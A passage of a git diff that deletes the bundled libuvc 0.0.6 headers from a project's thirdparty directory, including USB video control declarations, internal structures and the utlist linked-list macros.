-uvc_error_t uvc_set_saturation(uvc_device_handle_t *devh, uint16_t saturation);
-
-uvc_error_t uvc_get_sharpness(uvc_device_handle_t *devh, uint16_t* sharpness, enum uvc_req_code req_code);
-uvc_error_t uvc_set_sharpness(uvc_device_handle_t *devh, uint16_t sharpness);
-
-uvc_error_t uvc_get_gamma(uvc_device_handle_t *devh, uint16_t* gamma, enum uvc_req_code req_code);
-uvc_error_t uvc_set_gamma(uvc_device_handle_t *devh, uint16_t gamma);
-
-uvc_error_t uvc_get_white_balance_temperature(uvc_device_handle_t *devh, uint16_t* temperature, enum uvc_req_code req_code);
-uvc_error_t uvc_set_white_balance_temperature(uvc_device_handle_t *devh, uint16_t temperature);
-
-uvc_error_t uvc_get_white_balance_temperature_auto(uvc_device_handle_t *devh, uint8_t* temperature_auto, enum uvc_req_code req_code);
-uvc_error_t uvc_set_white_balance_temperature_auto(uvc_device_handle_t *devh, uint8_t temperature_auto);
-
-uvc_error_t uvc_get_white_balance_component(uvc_device_handle_t *devh, uint16_t* blue, uint16_t* red, enum uvc_req_code req_code);
-uvc_error_t uvc_set_white_balance_component(uvc_device_handle_t *devh, uint16_t blue, uint16_t red);
-
-uvc_error_t uvc_get_white_balance_component_auto(uvc_device_handle_t *devh, uint8_t* white_balance_component_auto, enum uvc_req_code req_code);
-uvc_error_t uvc_set_white_balance_component_auto(uvc_device_handle_t *devh, uint8_t white_balance_component_auto);
-
-uvc_error_t uvc_get_digital_multiplier(uvc_device_handle_t *devh, uint16_t* multiplier_step, enum uvc_req_code req_code);
-uvc_error_t uvc_set_digital_multiplier(uvc_device_handle_t *devh, uint16_t multiplier_step);
-
-uvc_error_t uvc_get_digital_multiplier_limit(uvc_device_handle_t *devh, uint16_t* multiplier_step, enum uvc_req_code req_code);
-uvc_error_t uvc_set_digital_multiplier_limit(uvc_device_handle_t *devh, uint16_t multiplier_step);
-
-uvc_error_t uvc_get_analog_video_standard(uvc_device_handle_t *devh, uint8_t* video_standard, enum uvc_req_code req_code);
-uvc_error_t uvc_set_analog_video_standard(uvc_device_handle_t *devh, uint8_t video_standard);
-
-uvc_error_t uvc_get_analog_video_lock_status(uvc_device_handle_t *devh, uint8_t* status, enum uvc_req_code req_code);
-uvc_error_t uvc_set_analog_video_lock_status(uvc_device_handle_t *devh, uint8_t status);
-
-uvc_error_t uvc_get_input_select(uvc_device_handle_t *devh, uint8_t* selector, enum uvc_req_code req_code);
-uvc_error_t uvc_set_input_select(uvc_device_handle_t *devh, uint8_t selector);
-/* end AUTO-GENERATED control accessors */
-
-void uvc_perror(uvc_error_t err, const char *msg);
-const char* uvc_strerror(uvc_error_t err);
-void uvc_print_diag(uvc_device_handle_t *devh, FILE *stream);
-void uvc_print_stream_ctrl(uvc_stream_ctrl_t *ctrl, FILE *stream);
-
-uvc_frame_t *uvc_allocate_frame(size_t data_bytes);
-void uvc_free_frame(uvc_frame_t *frame);
-
-uvc_error_t uvc_duplicate_frame(uvc_frame_t *in, uvc_frame_t *out);
-
-uvc_error_t uvc_yuyv2rgb(uvc_frame_t *in, uvc_frame_t *out);
-uvc_error_t uvc_uyvy2rgb(uvc_frame_t *in, uvc_frame_t *out);
-uvc_error_t uvc_any2rgb(uvc_frame_t *in, uvc_frame_t *out);
-
-uvc_error_t uvc_yuyv2bgr(uvc_frame_t *in, uvc_frame_t *out);
-uvc_error_t uvc_uyvy2bgr(uvc_frame_t *in, uvc_frame_t *out);
-uvc_error_t uvc_any2bgr(uvc_frame_t *in, uvc_frame_t *out);
-
-uvc_error_t uvc_yuyv2y(uvc_frame_t *in, uvc_frame_t *out);
-uvc_error_t uvc_yuyv2uv(uvc_frame_t *in, uvc_frame_t *out);
-
-#ifdef LIBUVC_HAS_JPEG
-uvc_error_t uvc_mjpeg2rgb(uvc_frame_t *in, uvc_frame_t *out);
-#endif
-
-#ifdef __cplusplus
-}
-#endif
-
-#endif // !def(LIBUVC_H)
-
diff --git a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_config.h b/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_config.h
deleted file mode 100644
index 9ab0ac9..0000000
--- a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_config.h
+++ /dev/null
@@ -1,22 +0,0 @@
-#ifndef LIBUVC_CONFIG_H
-#define LIBUVC_CONFIG_H
-
-#define LIBUVC_VERSION_MAJOR 0
-#define LIBUVC_VERSION_MINOR 0
-#define LIBUVC_VERSION_PATCH 6
-#define LIBUVC_VERSION_STR "0.0.6"
-#define LIBUVC_VERSION_INT                      \
-  ((0 << 16) |             \
-   (0 << 8) |              \
-   (6))
-
-/** @brief Test whether libuvc is new enough
- * This macro evaluates true iff the current version is
- * at least as new as the version specified.
- */
-#define LIBUVC_VERSION_GTE(major, minor, patch)                         \
-  (LIBUVC_VERSION_INT >= (((major) << 16) | ((minor) << 8) | (patch)))
-
-/* #define LIBUVC_HAS_JPEG 1 */
-
-#endif // !def(LIBUVC_CONFIG_H)
\ No newline at end of file
diff --git a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_config.h.in b/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_config.h.in
deleted file mode 100644
index 3bbd653..0000000
--- a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_config.h.in
+++ /dev/null
@@ -1,22 +0,0 @@
-#ifndef LIBUVC_CONFIG_H
-#define LIBUVC_CONFIG_H
-
-#define LIBUVC_VERSION_MAJOR @libuvc_VERSION_MAJOR@
-#define LIBUVC_VERSION_MINOR @libuvc_VERSION_MINOR@
-#define LIBUVC_VERSION_PATCH @libuvc_VERSION_PATCH@
-#define LIBUVC_VERSION_STR "@libuvc_VERSION@"
-#define LIBUVC_VERSION_INT                      \
-  ((@libuvc_VERSION_MAJOR@ << 16) |             \
-   (@libuvc_VERSION_MINOR@ << 8) |              \
-   (@libuvc_VERSION_PATCH@))
-
-/** @brief Test whether libuvc is new enough
- * This macro evaluates true iff the current version is
- * at least as new as the version specified.
- */
-#define LIBUVC_VERSION_GTE(major, minor, patch)                         \
-  (LIBUVC_VERSION_INT >= (((major) << 16) | ((minor) << 8) | (patch)))
-
-#cmakedefine LIBUVC_HAS_JPEG 1
-
-#endif // !def(LIBUVC_CONFIG_H)
diff --git a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_internal.h b/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_internal.h
deleted file mode 100644
index 829b294..0000000
--- a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_internal.h
+++ /dev/null
@@ -1,300 +0,0 @@
-/** @file libuvc_internal.h
-  * @brief Implementation-specific UVC constants and structures.
-  * @cond include_hidden
-  */
-#ifndef LIBUVC_INTERNAL_H
-#define LIBUVC_INTERNAL_H
-
-#include <assert.h>
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-#include <pthread.h>
-#include <signal.h>
-#include <libusb.h>
-#include "utlist.h"
-
-/** Converts an unaligned four-byte little-endian integer into an int32 */
-#define DW_TO_INT(p) ((p)[0] | ((p)[1] << 8) | ((p)[2] << 16) | ((p)[3] << 24))
-/** Converts an unaligned two-byte little-endian integer into an int16 */
-#define SW_TO_SHORT(p) ((p)[0] | ((p)[1] << 8))
-/** Converts an int16 into an unaligned two-byte little-endian integer */
-#define SHORT_TO_SW(s, p) \
-  (p)[0] = (s); \
-  (p)[1] = (s) >> 8;
-/** Converts an int32 into an unaligned four-byte little-endian integer */
-#define INT_TO_DW(i, p) \
-  (p)[0] = (i); \
-  (p)[1] = (i) >> 8; \
-  (p)[2] = (i) >> 16; \
-  (p)[3] = (i) >> 24;
-
-/** Selects the nth item in a doubly linked list. n=-1 selects the last item. */
-#define DL_NTH(head, out, n) \
-  do { \
-    int dl_nth_i = 0; \
-    LDECLTYPE(head) dl_nth_p = (head); \
-    if ((n) < 0) { \
-      while (dl_nth_p && dl_nth_i > (n)) { \
-        dl_nth_p = dl_nth_p->prev; \
-        dl_nth_i--; \
-      } \
-    } else { \
-      while (dl_nth_p && dl_nth_i < (n)) { \
-        dl_nth_p = dl_nth_p->next; \
-        dl_nth_i++; \
-      } \
-    } \
-    (out) = dl_nth_p; \
-  } while (0);
-
-#ifdef UVC_DEBUGGING
-#include <libgen.h>
-#define UVC_DEBUG(format, ...) fprintf(stderr, "[%s:%d/%s] " format "\n", basename(__FILE__), __LINE__, __FUNCTION__, ##__VA_ARGS__)
-#define UVC_ENTER() fprintf(stderr, "[%s:%d] begin %s\n", basename(__FILE__), __LINE__, __FUNCTION__)
-#define UVC_EXIT(code) fprintf(stderr, "[%s:%d] end %s (%d)\n", basename(__FILE__), __LINE__, __FUNCTION__, code)
-#define UVC_EXIT_VOID() fprintf(stderr, "[%s:%d] end %s\n", basename(__FILE__), __LINE__, __FUNCTION__)
-#else
-#define UVC_DEBUG(format, ...)
-#define UVC_ENTER()
-#define UVC_EXIT_VOID()
-#define UVC_EXIT(code)
-#endif
-
-/* http://stackoverflow.com/questions/19452971/array-size-macro-that-rejects-pointers */
-#define IS_INDEXABLE(arg) (sizeof(arg[0]))
-#define IS_ARRAY(arg) (IS_INDEXABLE(arg) && (((void *) &arg) == ((void *) arg)))
-#define ARRAYSIZE(arr) (sizeof(arr) / (IS_ARRAY(arr) ? sizeof(arr[0]) : 0))
-
-/** Video interface subclass code (A.2) */
-enum uvc_int_subclass_code {
-  UVC_SC_UNDEFINED = 0x00,
-  UVC_SC_VIDEOCONTROL = 0x01,
-  UVC_SC_VIDEOSTREAMING = 0x02,
-  UVC_SC_VIDEO_INTERFACE_COLLECTION = 0x03
-};
-
-/** Video interface protocol code (A.3) */
-enum uvc_int_proto_code {
-  UVC_PC_PROTOCOL_UNDEFINED = 0x00
-};
-
-/** VideoControl interface descriptor subtype (A.5) */
-enum uvc_vc_desc_subtype {
-  UVC_VC_DESCRIPTOR_UNDEFINED = 0x00,
-  UVC_VC_HEADER = 0x01,
-  UVC_VC_INPUT_TERMINAL = 0x02,
-  UVC_VC_OUTPUT_TERMINAL = 0x03,
-  UVC_VC_SELECTOR_UNIT = 0x04,
-  UVC_VC_PROCESSING_UNIT = 0x05,
-  UVC_VC_EXTENSION_UNIT = 0x06
-};
-
-/** UVC endpoint descriptor subtype (A.7) */
-enum uvc_ep_desc_subtype {
-  UVC_EP_UNDEFINED = 0x00,
-  UVC_EP_GENERAL = 0x01,
-  UVC_EP_ENDPOINT = 0x02,
-  UVC_EP_INTERRUPT = 0x03
-};
-
-/** VideoControl interface control selector (A.9.1) */
-enum uvc_vc_ctrl_selector {
-  UVC_VC_CONTROL_UNDEFINED = 0x00,
-  UVC_VC_VIDEO_POWER_MODE_CONTROL = 0x01,
-  UVC_VC_REQUEST_ERROR_CODE_CONTROL = 0x02
-};
-
-/** Terminal control selector (A.9.2) */
-enum uvc_term_ctrl_selector {
-  UVC_TE_CONTROL_UNDEFINED = 0x00
-};
-
-/** Selector unit control selector (A.9.3) */
-enum uvc_su_ctrl_selector {
-  UVC_SU_CONTROL_UNDEFINED = 0x00,
-  UVC_SU_INPUT_SELECT_CONTROL = 0x01
-};
-
-/** Extension unit control selector (A.9.6) */
-enum uvc_xu_ctrl_selector {
-  UVC_XU_CONTROL_UNDEFINED = 0x00
-};
-
-/** VideoStreaming interface control selector (A.9.7) */
-enum uvc_vs_ctrl_selector {
-  UVC_VS_CONTROL_UNDEFINED = 0x00,
-  UVC_VS_PROBE_CONTROL = 0x01,
-  UVC_VS_COMMIT_CONTROL = 0x02,
-  UVC_VS_STILL_PROBE_CONTROL = 0x03,
-  UVC_VS_STILL_COMMIT_CONTROL = 0x04,
-  UVC_VS_STILL_IMAGE_TRIGGER_CONTROL = 0x05,
-  UVC_VS_STREAM_ERROR_CODE_CONTROL = 0x06,
-  UVC_VS_GENERATE_KEY_FRAME_CONTROL = 0x07,
-  UVC_VS_UPDATE_FRAME_SEGMENT_CONTROL = 0x08,
-  UVC_VS_SYNC_DELAY_CONTROL = 0x09
-};
-
-/** Status packet type (2.4.2.2) */
-enum uvc_status_type {
-  UVC_STATUS_TYPE_CONTROL = 1,
-  UVC_STATUS_TYPE_STREAMING = 2
-};
-
-/** Payload header flags (2.4.3.3) */
-#define UVC_STREAM_EOH (1 << 7)
-#define UVC_STREAM_ERR (1 << 6)
-#define UVC_STREAM_STI (1 << 5)
-#define UVC_STREAM_RES (1 << 4)
-#define UVC_STREAM_SCR (1 << 3)
-#define UVC_STREAM_PTS (1 << 2)
-#define UVC_STREAM_EOF (1 << 1)
-#define UVC_STREAM_FID (1 << 0)
-
-/** Control capabilities (4.1.2) */
-#define UVC_CONTROL_CAP_GET (1 << 0)
-#define UVC_CONTROL_CAP_SET (1 << 1)
-#define UVC_CONTROL_CAP_DISABLED (1 << 2)
-#define UVC_CONTROL_CAP_AUTOUPDATE (1 << 3)
-#define UVC_CONTROL_CAP_ASYNCHRONOUS (1 << 4)
-
-struct uvc_streaming_interface;
-struct uvc_device_info;
-
-/** VideoStream interface */
-typedef struct uvc_streaming_interface {
-  struct uvc_device_info *parent;
-  struct uvc_streaming_interface *prev, *next;
-  /** Interface number */
-  uint8_t bInterfaceNumber;
-  /** Video formats that this interface provides */
-  struct uvc_format_desc *format_descs;
-  /** USB endpoint to use when communicating with this interface */
-  uint8_t bEndpointAddress;
-  uint8_t bTerminalLink;
-} uvc_streaming_interface_t;
-
-/** VideoControl interface */
-typedef struct uvc_control_interface {
-  struct uvc_device_info *parent;
-  struct uvc_input_terminal *input_term_descs;
-  // struct uvc_output_terminal *output_term_descs;
-  struct uvc_selector_unit *selector_unit_descs;
-  struct uvc_processing_unit *processing_unit_descs;
-  struct uvc_extension_unit *extension_unit_descs;
-  uint16_t bcdUVC;
-  uint32_t dwClockFrequency;
-  uint8_t bEndpointAddress;
-  /** Interface number */
-  uint8_t bInterfaceNumber;
-} uvc_control_interface_t;
-
-struct uvc_stream_ctrl;
-
-struct uvc_device {
-  struct uvc_context *ctx;
-  int ref;
-  libusb_device *usb_dev;
-};
-
-typedef struct uvc_device_info {
-  /** Configuration descriptor for USB device */
-  struct libusb_config_descriptor *config;
-  /** VideoControl interface provided by device */
-  uvc_control_interface_t ctrl_if;
-  /** VideoStreaming interfaces on the device */
-  uvc_streaming_interface_t *stream_ifs;
-} uvc_device_info_t;
-
-/*
-  set a high number of transfer buffers. This uses a lot of ram, but
-  avoids problems with scheduling delays on slow boards causing missed
-  transfers. A better approach may be to make the transfer thread FIFO
-  scheduled (if we have root).
-  We could/should change this to allow reduce it to, say, 5 by default
-  and then allow the user to change the number of buffers as required.
- */
-#define LIBUVC_NUM_TRANSFER_BUFS 100
-
-#define LIBUVC_XFER_BUF_SIZE	( 16 * 1024 * 1024 )
-
-struct uvc_stream_handle {
-  struct uvc_device_handle *devh;
-  struct uvc_stream_handle *prev, *next;
-  struct uvc_streaming_interface *stream_if;
-
-  /** if true, stream is running (streaming video to host) */
-  uint8_t running;
-  /** Current control block */
-  struct uvc_stream_ctrl cur_ctrl;
-
-  /* listeners may only access hold*, and only when holding a
-   * lock on cb_mutex (probably signaled with cb_cond) */
-  uint8_t fid;
-  uint32_t seq, hold_seq;
-  uint32_t pts, hold_pts;
-  uint32_t last_scr, hold_last_scr;
-  size_t got_bytes, hold_bytes;
-  uint8_t *outbuf, *holdbuf;
-  pthread_mutex_t cb_mutex;
-  pthread_cond_t cb_cond;
-  pthread_t cb_thread;
-  uint32_t last_polled_seq;
-  uvc_frame_callback_t *user_cb;
-  void *user_ptr;
-  struct libusb_transfer *transfers[LIBUVC_NUM_TRANSFER_BUFS];
-  uint8_t *transfer_bufs[LIBUVC_NUM_TRANSFER_BUFS];
-  struct uvc_frame frame;
-  enum uvc_frame_format frame_format;
-};
-
-/** Handle on an open UVC device
- *
- * @todo move most of this into a uvc_device struct?
- */
-struct uvc_device_handle {
-  struct uvc_device *dev;
-  struct uvc_device_handle *prev, *next;
-  /** Underlying USB device handle */
-  libusb_device_handle *usb_devh;
-  struct uvc_device_info *info;
-  struct libusb_transfer *status_xfer;
-  uint8_t status_buf[32];
-  /** Function to call when we receive status updates from the camera */
-  uvc_status_callback_t *status_cb;
-  void *status_user_ptr;
-  /** Function to call when we receive button events from the camera */
-  uvc_button_callback_t *button_cb;
-  void *button_user_ptr;
-
-  uvc_stream_handle_t *streams;
-  /** Whether the camera is an iSight that sends one header per frame */
-  uint8_t is_isight;
-  uint32_t claimed;
-};
-
-/** Context within which we communicate with devices */
-struct uvc_context {
-  /** Underlying context for USB communication */
-  struct libusb_context *usb_ctx;
-  /** True iff libuvc initialized the underlying USB context */
-  uint8_t own_usb_ctx;
-  /** List of open devices in this context */
-  uvc_device_handle_t *open_devices;
-  pthread_t handler_thread;
-  int kill_handler_thread;
-};
-
-uvc_error_t uvc_query_stream_ctrl(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    uint8_t probe,
-    enum uvc_req_code req);
-
-void uvc_start_handler_thread(uvc_context_t *ctx);
-uvc_error_t uvc_claim_if(uvc_device_handle_t *devh, int idx);
-uvc_error_t uvc_release_if(uvc_device_handle_t *devh, int idx);
-
-#endif // !def(LIBUVC_INTERNAL_H)
-/** @endcond */
-
diff --git a/thirdparty/libuvc-0.0.6/include/utlist.h b/thirdparty/libuvc-0.0.6/include/utlist.h
deleted file mode 100644
index 34c725b..0000000
--- a/thirdparty/libuvc-0.0.6/include/utlist.h
+++ /dev/null
@@ -1,490 +0,0 @@
-/*
-Copyright (c) 2007-2010, Troy D. Hanson   http://uthash.sourceforge.net
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-    * Redistributions of source code must retain the above copyright
-      notice, this list of conditions and the following disclaimer.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
-IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
-TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
-PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
-OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
-EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
-PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
-PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
-LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
-NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
-SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#ifndef UTLIST_H
-#define UTLIST_H
-
-#define UTLIST_VERSION 1.9.1
-
-/* 
- * This file contains macros to manipulate singly and doubly-linked lists.
- *
- * 1. LL_ macros:  singly-linked lists.
- * 2. DL_ macros:  doubly-linked lists.
- * 3. CDL_ macros: circular doubly-linked lists.
- *
- * To use singly-linked lists, your structure must have a "next" pointer.
- * To use doubly-linked lists, your structure must "prev" and "next" pointers.
- * Either way, the pointer to the head of the list must be initialized to NULL.
- * 
- * ----------------.EXAMPLE -------------------------
- * struct item {
- *      int id;
- *      struct item *prev, *next;
- * }
- *
- * struct item *list = NULL:
- *
- * int main() {
- *      struct item *item;
- *      ... allocate and populate item ...
- *      DL_APPEND(list, item);
- * }
- * --------------------------------------------------
- *
- * For doubly-linked lists, the append and delete macros are O(1)
- * For singly-linked lists, append and delete are O(n) but prepend is O(1)
- * The sort macro is O(n log(n)) for all types of single/double/circular lists.
- */
-
-/* These macros use decltype or the earlier __typeof GNU extension.
-   As decltype is only available in newer compilers (VS2010 or gcc 4.3+
-   when compiling c++ code), this code uses whatever method is needed
-   or, for VS2008 where neither is available, uses casting workarounds. */
-#ifdef _MSC_VER            /* MS compiler */
-#if _MSC_VER >= 1600 && defined(__cplusplus)  /* VS2010 or newer in C++ mode */
-#define LDECLTYPE(x) decltype(x)
-#else                     /* VS2008 or older (or VS2010 in C mode) */
-#define NO_DECLTYPE
-#define LDECLTYPE(x) char*
-#endif
-#else                      /* GNU, Sun and other compilers */
-#define LDECLTYPE(x) __typeof(x)
-#endif
-
-/* for VS2008 we use some workarounds to get around the lack of decltype,
- * namely, we always reassign our tmp variable to the list head if we need
- * to dereference its prev/next pointers, and save/restore the real head.*/
-#ifdef NO_DECLTYPE
-#define _SV(elt,list) _tmp = (char*)(list); {char **_alias = (char**)&(list); *_alias = (elt); }
-#define _NEXT(elt,list) ((char*)((list)->next))
-#define _NEXTASGN(elt,list,to) { char **_alias = (char**)&((list)->next); *_alias=(char*)(to); }
-#define _PREV(elt,list) ((char*)((list)->prev))
-#define _PREVASGN(elt,list,to) { char **_alias = (char**)&((list)->prev); *_alias=(char*)(to); }
-#define _RS(list) { char **_alias = (char**)&(list); *_alias=_tmp; }
-#define _CASTASGN(a,b) { char **_alias = (char**)&(a); *_alias=(char*)(b); }
-#else 
-#define _SV(elt,list)
-#define _NEXT(elt,list) ((elt)->next)
-#define _NEXTASGN(elt,list,to) ((elt)->next)=(to)
-#define _PREV(elt,list) ((elt)->prev)
-#define _PREVASGN(elt,list,to) ((elt)->prev)=(to)
-#define _RS(list)
-#define _CASTASGN(a,b) (a)=(b)
-#endif
-
-/******************************************************************************
- * The sort macro is an adaptation of Simon Tatham's O(n log(n)) mergesort    *
- * Unwieldy variable names used here to avoid shadowing passed-in variables.  *
- *****************************************************************************/
-#define LL_SORT(list, cmp)                                                                     \
-do {                                                                                           \
-  LDECLTYPE(list) _ls_p;                                                                       \
-  LDECLTYPE(list) _ls_q;                                                                       \
-  LDECLTYPE(list) _ls_e;                                                                       \
-  LDECLTYPE(list) _ls_tail;                                                                    \
-  LDECLTYPE(list) _ls_oldhead;                                                                 \
-  LDECLTYPE(list) _tmp;                                                                        \
-  int _ls_insize, _ls_nmerges, _ls_psize, _ls_qsize, _ls_i, _ls_looping;                       \
-  if (list) {                                                                                  \
-    _ls_insize = 1;                                                                            \
-    _ls_looping = 1;                                                                           \
-    while (_ls_looping) {                                                                      \
-      _CASTASGN(_ls_p,list);                                                                   \
-      _CASTASGN(_ls_oldhead,list);                                                             \
-      list = NULL;                                                                             \
-      _ls_tail = NULL;                                                                         \
-      _ls_nmerges = 0;                                                                         \
-      while (_ls_p) {                                                                          \
-        _ls_nmerges++;                                                                         \
-        _ls_q = _ls_p;                                                                         \
-        _ls_psize = 0;                                                                         \
-        for (_ls_i = 0; _ls_i < _ls_insize; _ls_i++) {                                         \
-          _ls_psize++;                                                                         \
-          _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list);                               \
-          if (!_ls_q) break;                                                                   \
-        }                                                                                      \
-        _ls_qsize = _ls_insize;                                                                \
-        while (_ls_psize > 0 || (_ls_qsize > 0 && _ls_q)) {                                    \
-          if (_ls_psize == 0) {                                                                \
-            _ls_e = _ls_q; _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list); _ls_qsize--; \
-          } else if (_ls_qsize == 0 || !_ls_q) {                                               \
-            _ls_e = _ls_p; _SV(_ls_p,list); _ls_p = _NEXT(_ls_p,list); _RS(list); _ls_psize--; \
-          } else if (cmp(_ls_p,_ls_q) <= 0) {                                                  \
-            _ls_e = _ls_p; _SV(_ls_p,list); _ls_p = _NEXT(_ls_p,list); _RS(list); _ls_psize--; \
-          } else {                                                                             \
-            _ls_e = _ls_q; _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list); _ls_qsize--; \
-          }                                                                                    \
-          if (_ls_tail) {                                                                      \
-            _SV(_ls_tail,list); _NEXTASGN(_ls_tail,list,_ls_e); _RS(list);                     \
-          } else {                                                                             \
-            _CASTASGN(list,_ls_e);                                                             \
-          }                                                                                    \
-          _ls_tail = _ls_e;                                                                    \
-        }                                                                                      \
-        _ls_p = _ls_q;                                                                         \
-      }                                                                                        \
-      _SV(_ls_tail,list); _NEXTASGN(_ls_tail,list,NULL); _RS(list);                            \
-      if (_ls_nmerges <= 1) {                                                                  \
-        _ls_looping=0;                                                                         \
-      }                                                                                        \
-      _ls_insize *= 2;                                                                         \
-    }                                                                                          \
-  } else _tmp=NULL; /* quiet gcc unused variable warning */                                    \
-} while (0)
-
-#define DL_SORT(list, cmp)                                                                     \
-do {                                                                                           \
-  LDECLTYPE(list) _ls_p;                                                                       \
-  LDECLTYPE(list) _ls_q;                                                                       \
-  LDECLTYPE(list) _ls_e;                                                                       \
-  LDECLTYPE(list) _ls_tail;                                                                    \
-  LDECLTYPE(list) _ls_oldhead;                                                                 \
-  LDECLTYPE(list) _tmp;                                                                        \
-  int _ls_insize, _ls_nmerges, _ls_psize, _ls_qsize, _ls_i, _ls_looping;                       \
-  if (list) {                                                                                  \
-    _ls_insize = 1;                                                                            \
-    _ls_looping = 1;                                                                           \
-    while (_ls_looping) {                                                                      \
-      _CASTASGN(_ls_p,list);                                                                   \
-      _CASTASGN(_ls_oldhead,list);                                                             \
-      list = NULL;                                                                             \
-      _ls_tail = NULL;                                                                         \
-      _ls_nmerges = 0;                                                                         \
-      while (_ls_p) {                                                                          \
-        _ls_nmerges++;                                                                         \
-        _ls_q = _ls_p;                                                                         \
-        _ls_psize = 0;                                                                         \
-        for (_ls_i = 0; _ls_i < _ls_insize; _ls_i++) {                                         \
-          _ls_psize++;                                                                         \
-          _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list);                               \
-          if (!_ls_q) break;                                                                   \
-        }                                                                                      \
-        _ls_qsize = _ls_insize;                                                                \
-        while (_ls_psize > 0 || (_ls_qsize > 0 && _ls_q)) {                                    \
-          if (_ls_psize == 0) {                                                                \
-            _ls_e = _ls_q; _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list); _ls_qsize--; \
-          } else if (_ls_qsize == 0 || !_ls_q) {                                               \
-            _ls_e = _ls_p; _SV(_ls_p,list); _ls_p = _NEXT(_ls_p,list); _RS(list); _ls_psize--; \
-          } else if (cmp(_ls_p,_ls_q) <= 0) {                                                  \
-            _ls_e = _ls_p; _SV(_ls_p,list); _ls_p = _NEXT(_ls_p,list); _RS(list); _ls_psize--; \
-          } else {                                                                             \
-            _ls_e = _ls_q; _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list); _ls_qsize--; \
-          }                                                                                    \
-          if (_ls_tail) {                                                                      \
-            _SV(_ls_tail,list); _NEXTASGN(_ls_tail,list,_ls_e); _RS(list);                     \
-          } else {                                                                             \
-            _CASTASGN(list,_ls_e);                                                             \
-          }                                                                                    \
-          _SV(_ls_e,list); _PREVASGN(_ls_e,list,_ls_tail); _RS(list);                          \
-          _ls_tail = _ls_e;                                                                    \
-        }                                                                                      \
-        _ls_p = _ls_q;                                                                         \
-      }                                                                                        \
-      _CASTASGN(list->prev, _ls_tail);                                                         \
-      _SV(_ls_tail,list); _NEXTASGN(_ls_tail,list,NULL); _RS(list);                            \
-      if (_ls_nmerges <= 1) {                                                                  \
-        _ls_looping=0;                                                                         \
-      }                                                                                        \
-      _ls_insize *= 2;                                                                         \
-    }                                                                                          \
-  } else _tmp=NULL; /* quiet gcc unused variable warning */                                    \
-} while (0)
-
-#define CDL_SORT(list, cmp)                                                                    \
-do {                                                                                           \
-  LDECLTYPE(list) _ls_p;                                                                       \
-  LDECLTYPE(list) _ls_q;                                                                       \
-  LDECLTYPE(list) _ls_e;                                                                       \
-  LDECLTYPE(list) _ls_tail;                                                                    \
-  LDECLTYPE(list) _ls_oldhead;                                                                 \
-  LDECLTYPE(list) _tmp;                                                                        \
-  LDECLTYPE(list) _tmp2;                                                                       \
-  int _ls_insize, _ls_nmerges, _ls_psize, _ls_qsize, _ls_i, _ls_looping;                       \
-  if (list) {                                                                                  \
-    _ls_insize = 1;                                                                            \
-    _ls_looping = 1;                                                                           \
-    while (_ls_looping) {                                                                      \
-      _CASTASGN(_ls_p,list);                                                                   \
-      _CASTASGN(_ls_oldhead,list);                                                             \
-      list = NULL;                                                                             \
-      _ls_tail = NULL;                                                                         \
-      _ls_nmerges = 0;                                                                         \
-      while (_ls_p) {                                                                          \
-        _ls_nmerges++;                                                                         \
-        _ls_q = _ls_p;                                                                         \
-        _ls_psize = 0;                                                                         \
-        for (_ls_i = 0; _ls_i < _ls_insize; _ls_i++) {                                         \
-          _ls_psize++;                                                                         \
-          _SV(_ls_q,list);                                                                     \
-          if (_NEXT(_ls_q,list) == _ls_oldhead) {                                              \
-            _ls_q = NULL;                                                                      \
-          } else {                                                                             \
-            _ls_q = _NEXT(_ls_q,list);                                                         \
-          }                                                                                    \
-          _RS(list);                                                                           \
-          if (!_ls_q) break;                                                                   \
-        }                                                                                      \
-        _ls_qsize = _ls_insize;                                                                \
-        while (_ls_psize > 0 || (_ls_qsize > 0 && _ls_q)) {                                    \
-          if (_ls_psize == 0) {                                                                \
-            _ls_e = _ls_q; _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list); _ls_qsize--; \
-            if (_ls_q == _ls_oldhead) { _ls_q = NULL; }                                        \
-          } else if (_ls_qsize == 0 || !_ls_q) {                                               \
-            _ls_e = _ls_p; _SV(_ls_p,list); _ls_p = _NEXT(_ls_p,list); _RS(list); _ls_psize--; \
-            if (_ls_p == _ls_oldhead) { _ls_p = NULL; }                                        \
-          } else if (cmp(_ls_p,_ls_q) <= 0) {                                                  \
-            _ls_e = _ls_p; _SV(_ls_p,list); _ls_p = _NEXT(_ls_p,list); _RS(list); _ls_psize--; \
-            if (_ls_p == _ls_oldhead) { _ls_p = NULL; }                                        \
